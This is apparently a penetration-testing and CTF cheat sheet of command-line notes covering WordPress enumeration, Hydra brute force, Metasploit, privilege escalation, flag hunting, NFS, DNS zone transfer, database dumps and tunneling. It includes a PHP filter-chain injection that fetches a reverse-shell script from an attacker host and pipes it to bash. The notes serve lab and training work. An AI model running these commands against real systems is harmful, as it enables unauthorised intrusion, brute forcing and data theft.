- Aperisolve
- Stereogram Solver
- Steghide:
steghide extract -sf screen.jpeg - Depixelize
- Depix:
python3 depix.py -p pixel_image -s images/searchimages/image.png - Unredactor
- Depix:
- Wordpress
- User enumeration:
wpscan --url url --enumerate u - Check vulnerable templates/plugins:
wpscan --url url --enumerate vp,vt - Bruteforce:
wpscan --url url_wordpress --passwords wordlist - Example:
wpscan --url https://www.hackinprovence.fr/ -e u
- User enumeration:
- PHP Filters
- Code injection:
python3 script.py --chain '<?= `wget attack_ip/revshell|bash`?>'
- Code injection:
- Enumeration
- Path Enumeration
- Dirsearch
- FeroxBuster:
- Basic scan:
feroxbuster -u url -w ~/Desktop/SecLists-master/Discovery/Web-Content/common.txt --filter-status 404 - Advanced scan:
feroxbuster -u http://example.com -w wordlist -x php,html,txt -v -o output.txt --filter-status 404
- Basic scan:
- Path Enumeration
- Bruteforce Forms
- Hydra:
hydra -l admin -P SecLists-master/rockyou.txt 10.150.150.38 -s 30609 -t 20 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"
- Hydra:
- Metasploit
msfconsole- Local exploit suggester:
multi/recon/local_exploit_suggester
- Local exploit suggester:
- Upgrade session:
sessions -u <id>
- Searchsploit
- Usage:
searchsploit xxxx - Extract exploit:
searchsploit -m chemin
- Usage:
- Linpeas
- Hosting HTTP server:
sudo python3 -m http.server port(attacker) and then wget on victim
- Hosting HTTP server:
- SUID:
find / -perm -u=s -type f 2>/dev/null - Symbolic Link Exploit:
ln -s /root /home/michael/important_files/root_backup - LXC/LXD Privilege Escalation
- Windows Escalation
- Shell upgrade:
sessions -u id- Migrate process:
ps --> migrate pid
- Metasploit:
- Local exploit suggester:
multi/recon/local_exploit_suggester
- Local exploit suggester:
- Shell upgrade:
- Linux
find ./* | grep FLAG3find / -name FLAG6.txt 2>/dev/nullfind / -type f -name 'FLAG[0-9][0-9]' 2>/dev/nullfind / -type f -name 'FLAG[0-9].txt' 2>/dev/null
- Windows
@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"
- Redirect errors to file:
2>fichierthen usecat fichier - Dumb Shell Upgrade:
- Python:
python -c 'import pty; pty.spawn("/bin/bash")' - Python 3:
python3 -c 'import pty; pty.spawn("/bin/bash")'
- Python:
- Netstat:
netstat -antup
- FTP
- Verify anonymous login
- NFS
- Show mounts:
showmount -e IP - RPC info:
rpcinfo IP - Mount:
sudo mount -t nfs ip:/remote /local - Unmount:
sudo umount 10.150.150.59:/nfsroot
- Show mounts:
- SSH
- Test connection to check banner
- Connect with private key:
ssh -i id_rsa user@ip
- DNS
- AXFR:
dig @mortysserver.com mortysserver.com axfr - Edit
/etc/hostsif needed:10.150.150.57 rickscontrolpanel.mortysserver.com
- AXFR:
- MySQL
- Connect:
mysql -h localhost -u sql_user -p - Dump all databases:
mysqldump -u root -p --all-databases > alldb.sql
- Connect:
- Basic scan:
nmap -sV -sC -T5 -p- ip - SYN scan:
sudo nmap -sF -p1-100 -T4
- Check for services listening on localhost:
netstat -antup - Tunneling & Port Forwarding
- If SSH access is available:
sshuttle -r user@ip -N - Web service on localhost:
- Victim:
./chisel client ip_host:7777 R:8080:127.0.0.1:8080 - Host:
chisel server -port 7777 --reverse
- Victim:
- If SSH access is available: